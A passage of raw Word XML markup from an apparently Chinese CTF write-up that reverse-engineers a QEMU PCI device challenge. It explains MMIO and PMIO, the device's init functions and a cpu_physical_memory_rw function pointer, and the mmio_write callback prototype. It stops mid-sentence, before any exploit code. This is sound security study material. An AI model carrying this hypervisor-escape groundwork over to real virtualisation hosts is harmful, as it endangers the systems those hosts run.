      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注册初始化函数</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存读写的handler，</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发回调函数</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidR="00DC2DF8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟设备的逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1672A91A" w14:textId="77777777" w:rsidR="008E1091" w:rsidRDefault="00DC2DF8" w:rsidP="008E1091">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PCI设备通常包含一组寄存器，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过总线访问寄存器，从而与设备交互。</w:t>
      </w:r>
      <w:r w:rsidR="008A687B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这意味着系统需要给设备分配总线地址</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。分配地址的方式有 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，I/O设备与RAM使用同一共享空间，每个寄存器对应一个内存地址。在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>内存和I/O设备有各自的地址空间，</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>通过 in、out、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>outw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>,、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>outl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t xml:space="preserve"> 等</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊</w:t>
      </w:r>
      <w:r w:rsidR="008E1091" w:rsidRPr="008E1091">
        <w:t>指令实现交互。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA2172" w14:textId="2D4FB088" w:rsidR="00754E56" w:rsidRDefault="00DC2DF8" w:rsidP="008C16D9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本题的驱动</w:t>
      </w:r>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来描述题目的设备。该设备仅使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行 io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交互</w:t>
      </w:r>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000433CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtuctf_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmio_read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/write 是</w:t>
      </w:r>
      <w:r w:rsidR="008E1091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听内存读写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回调函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F6B74" w14:textId="77777777" w:rsidR="00FE0B7E" w:rsidRDefault="00FE0B7E" w:rsidP="008C16D9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D82DC6" w14:textId="2188494E" w:rsidR="004E5C0E" w:rsidRDefault="00FE0B7E" w:rsidP="004E5C0E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>逆向</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961F508" w14:textId="279F73D5" w:rsidR="004E5C0E" w:rsidRDefault="004E5C0E" w:rsidP="008C16D9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instance_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别初始化了static变量和非static变量。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是向系统注册了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mmio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的读写函数，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的变量则主要在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instance_init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中初始化。其中，函数指针p 被赋值为 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用于实现</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006110B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的数据搬移。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910082A" w14:textId="30D411F0" w:rsidR="001A342A" w:rsidRPr="008C16D9" w:rsidRDefault="004E5C0E" w:rsidP="00FE0B7E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AFF63E0" wp14:editId="52A74CDC">
            <wp:extent cx="4115157" cy="1310754"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3868331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833150" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4115157" cy="1310754"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A18079" w14:textId="525D1CE4" w:rsidR="008C16D9" w:rsidRDefault="008C16D9" w:rsidP="008C16D9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mmio_write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC260BA" w14:textId="18C2E0EF" w:rsidR="000433CA" w:rsidRDefault="000433CA" w:rsidP="000433CA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每次对PCI 内存的写入会触发</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mmio_write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 回调，函数的原型如下</w:t>
      </w:r>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。opaque是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象的指针，记录设备当前内部状态。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是本次访存的起始地址，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是写入的值，size是写入的字节长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BA0F89" w14:textId="77777777" w:rsidR="004F257C" w:rsidRPr="001A342A" w:rsidRDefault="004F257C" w:rsidP="004F257C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1B2426"/>
        <w:spacing w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="300" w:firstLine="540"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sjtuctf_mmio_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> *opaque, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>hwaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495ED5B1" w14:textId="1DC07325" w:rsidR="000433CA" w:rsidRPr="001A342A" w:rsidRDefault="004F257C" w:rsidP="004F257C">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1B2426"/>
        <w:spacing w:line="336" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="1400" w:firstLine="2520"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">uint64_t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, unsigned int size</w:t>
      </w:r>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="B9BDB6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F597AD7" w14:textId="6C2C3C5F" w:rsidR="001A342A" w:rsidRDefault="000433CA" w:rsidP="004B67A9">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设备为每个寄存器分配了一个内存地址。在实现上，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mmio_write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00233CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内部有一个关于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F257C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidR="00233CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的switch语句。函数会根据访存的地址，分别执行不同的逻辑，以模拟不同寄存器的行为。在本题中，write函数会首先判定</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00233CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00233CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;0x7f</w:t>
      </w:r>
      <w:r w:rsidR="004B67A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。当</w:t>
      </w:r>
